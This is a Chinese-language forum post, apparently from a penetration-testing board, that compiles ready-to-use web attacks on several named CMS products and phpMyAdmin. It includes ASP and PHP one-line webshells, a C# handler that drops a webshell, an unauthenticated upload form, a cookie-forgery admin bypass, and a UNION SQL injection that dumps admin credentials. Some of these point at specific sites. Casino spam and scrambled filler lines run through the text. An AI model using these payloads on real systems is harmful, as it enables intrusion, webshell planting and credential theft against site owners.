登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
6 x8 D: E2 S1 b2 ?3 h! P) g4 U
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
& }! }& A/ K1 [ k
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( c- U- D/ N: l5 L+ p7 g y. V9 V
: s% H9 g7 w# h; t$ g5 r
YxShop易想购物商城4.7.1版本任意文件上传漏洞
0 I: r; [: y6 n' S1 J
7 U/ o9 {4 M$ X
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
3 ]; |1 G% q4 q8 j5 t
跳转到网站根目录上传任意文件。
r% S! o- H2 f2 J {
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
% w. L- V5 B" R2 j
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
0 g5 [' a$ @3 X) A) \) X2 H
Upload a new file:<br>
5 m/ Z6 m3 T, |. o4 J7 a0 t
<input type="file" name="NewFile" size="50"><br>
/ H( s1 y* E& W' G7 T! f9 v
<input id="btnUpload" type="submit" value="Upload">
! Q4 u/ I3 N+ p
</form>
, q8 D0 X6 ? w
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- i5 F: G* R$ Z, c$ h+ x. y
# n/ i- B6 F/ ~( \) i0 P5 {! |
SDcms 后台拿webshell
2 Z6 t+ W$ g" A) ]2 ^) _
2 F/ X' n h7 }6 V
第一种方法:
! B5 W. T6 x2 i& f0 ?& N( L( y+ M
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
: L8 t' @9 p6 h1 Q; |0 r
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
/ d a4 c! P+ O! @
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
2 H |$ I3 B# F, V/ F
第二种方法:
: B# F, i h, Y; n8 |; q/ \
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
5 Z7 K6 ~) s4 W, y) U6 Q4 s5 R
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
9 r9 g1 h Q+ ^
第三种方法:
5 W1 e0 q3 ?3 D- P: n$ l/ c+ Q* L
进入后台-->界面管理-->模板文件管理-->创建文件
) }9 V* f$ z t
文件名写入getshell.ashx
. m) Q8 Y9 }* x/ H
内容写入下面内容:
8 D2 U2 f6 W2 J6 i- q$ h/ a
/====================复制下面的=========================/
C, @4 @* O/ O1 a
<%@ WebHandler Language="C#" Class="Handler" %>
7 ^1 Z6 a/ e5 a6 m; I4 C
using System;
) R b2 u! e {0 W5 F4 S1 b
using System.Web;
q( h. T! K# D+ O# ~
using System.IO;
: i" i1 Z* z, Z- |4 g' _
public class Handler : IHttpHandler {
# g" l2 F0 I, Z6 E
public void ProcessRequest (HttpContext context) {
- O w/ N. _- o7 A
context.Response.ContentType = "text/plain";
- k* b. J' v9 s+ t3 Y2 a
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
* K( `! W/ u8 _0 o
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
+ K7 Y* v( |' B8 t5 a
file1.Flush();
% [3 p: j- R; l# _8 r" P# b. h
file1.Close();
6 z- D' f- t5 M: A7 q- m
}
9 ^' `, ^4 q4 m
public bool IsReusable {
' y& W8 q( A* i1 `3 @; |3 m
get {
4 U1 Z8 G2 k5 ~" W0 o
return false;
- @- b# j; i% J( a- ~- s5 H1 }( s- Q
}
) Z. J+ G5 J3 D. z9 | j+ j- z
}
0 W2 X2 g% L$ o% D* `( [, P" L
}
0 j6 _# K$ v$ z& [+ p) U/ U- b1 ~9 U
/=============================================/
% r h9 Y' l9 C5 z0 t' N+ Y
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
7 n# g9 g+ `! \8 j" \; N
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
6 s* |/ N% ?3 W0 s# M; S
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 I2 I" a% k) v& T3 q- m9 ?# v
3 g4 w* a ~9 Y |) q2 Y
ESCMS网站管理系统0day
2 g+ Z% X, b& H# P5 m8 C( o
) R5 r1 z4 F# [( L" b+ w
后台登陆验证是通过admin/check.asp实现的
) o# ^! F8 p& \
( K9 w, \% h( i+ X. \; M4 T
首先我们打开
http://target.com/admin/es_index.html
8 _, x6 D/ d( q" C& @1 Z8 N2 ^0 x
然后在COOKIE结尾加上
9 w2 r/ m7 @1 h: y* D
; ESCMS$_SP2=ES_admin=st0p;
0 E3 H, [! `, K9 W
修改,然后刷新
1 }9 Z+ v! q" X$ s" o5 z8 W$ j2 G
进后台了嘎..
6 c5 Y% u$ f3 o& t3 p$ i9 B
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
2 G/ h! D; N- E# j
, I3 X9 X6 Z( \( U/ m) g
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
" P5 ]' n) s$ a
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
6 f& W& W% d; f* n+ U6 ]
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
) c* W' R$ @8 v& H! ]
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
& {* b' l ]; e
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" L$ J2 ]9 P8 q% R* n3 n1 X: R% m
/ ?# @" i: |2 Q( q) w
宁志网站管理系统后台无验证漏洞及修复
. p& d) r5 n% V/ T# ^& o
$ p2 }6 L& M3 `. }% y
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
2 B* P' h; R* I
官方网站:
www.ningzhi.net
1 p; Y! h8 N1 y* B
学校网站管理系统 V.2011版本
' H( r) @8 P/ b7 y0 N: s( @
http://down.chinaz.com/soft/29943.htm
" V, @7 J5 c [. `
其它版本(如:政府版等),自行下载.
6 s) A$ I4 d9 E
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
+ U* y; ?* e* w2 o9 s6 ~( [
login.asp代码如下:
" X/ }* A4 U8 B+ }3 W( k- m- ~
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
; ^0 |- |4 O- B7 {7 `3 x6 ]
manage.asp代码我就不帖出来了.反正也没验证.
! R/ `: f' r; X, g7 U5 ^& R
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
. _" U. E7 k/ C3 _9 y
漏洞利用:
: F( {% \5 o+ |3 O' u) f6 y; `1 c
直接访问
http://www.0855.tv/admin/manage.asp
0 A$ a9 A: o9 E
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
, V: s) y' A$ m; U
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( c5 Q' G5 T1 _, O$ t, K6 ~( ?
o! d" A5 w6 ~3 P8 k6 i: v8 Z
phpmyadmin拿shell的四种方法总结及修复
5 D6 F. l5 ^; D2 J1 O0 B
: S# F- O+ }4 r
方法一:
- s: s+ ~. ^1 c
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
1 a2 E( v+ p0 C- B
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
9 @2 D. {3 @& `# e8 N8 U9 g$ P
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
. j4 ?5 @5 H9 C+ X e7 r
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
* Q/ D6 x9 Q, J$ _% L2 ?7 ^
一句话连接密码:7on
$ L& u5 I; `3 X% b$ U
方法二:
" O2 I. x* [. }5 w: z6 `
读取文件内容: select load_file('E:/xamp/www/s.php');
2 x- I! u9 Q7 w, |7 P1 E
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
8 V i1 ? A* m# c4 B
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
" W! K2 {7 R& F- J% L
方法三:
$ U& T- r1 e- _" _- y+ T; W
JhackJ版本 PHPmyadmin拿shell
5 _% B3 P7 M _ f* p
Create TABLE study (cmd text NOT NULL);
; h* V+ K& v' t# Y1 L0 f; U
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
% C9 z4 A/ ]6 f( U
select cmd from study into outfile 'E:/wamp/www/7.php';
3 p9 I$ G0 V4 Y% R* V; Q& L; Y: \
Drop TABLE IF EXISTS study;
5 I1 T9 X6 C8 o; Y5 l& [
<?php eval($_POST[cmd])?>
0 o; f. s5 f2 q3 h5 d) [! z
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
# \4 a" C, p7 K6 W" b. J
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
' C& J4 w3 u: s/ w- L
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
( @9 g& r6 |. m8 S& i7 Z- T
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
( b) [, K: S! Z, m
方法四:
5 h% c* P) s1 a- P* T
select load_file('E:/xamp/www/study.php');
# G4 f2 P$ k& ~' d! U
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
; v2 N: B$ f' |4 B" N6 h
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
7 e. B3 _$ h; _* \, n8 c1 F- e& G
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ ~/ ^" D! t5 j! p3 Z& N: L1 |
' C/ s# u) A2 h5 A$ |! Q8 q
NO.001中学网站管理系统 Build 110628 注入漏洞
7 E0 m6 K. d/ }% {: u8 h
' q' E! z/ ~7 X3 O! ~8 ?1 i
NO.001中学网站管理系统功能模块:
+ C( _" y# p# |7 H, `
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
% |& z# \4 g6 z e9 I- a9 @4 a% d
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
% C, i1 A/ u3 H
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
% m& O k9 v2 q, r% B& `
4.视频图片管理:一级分类,动态添加视频或者图片等信息
( f( T% @* N' r/ X) A3 [' L
5.留言管理:对留言,修改,删除、回复等管理
5 o) z+ B3 J4 i3 X! @* E7 ]
6.校友频道:包括校友资料excel导出、管理等功能
% y# Z1 i& ^6 z/ j
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
& z, N4 g5 n C, ]2 k7 f
默认后台:admin/login.asp
$ N7 l) x4 G# z% V
官方演示:
http://demo.001cms.net
- T8 F& ]# O) Y
源码下载地址:
http://down.chinaz.com/soft/30187.htm
+ B. W2 K# p) W2 Q E1 Y( T4 _+ ^
EXP:
3 t0 A/ c# U6 u( h* i8 o
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
* q9 m! B' } m1 C- i! o
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
/ y, e7 h: A% i. ^3 F1 |
getshell:后台有备份,你懂的
1 w" G+ N3 B- k/ N& R
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
' J1 W* ~: i/ s" z
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2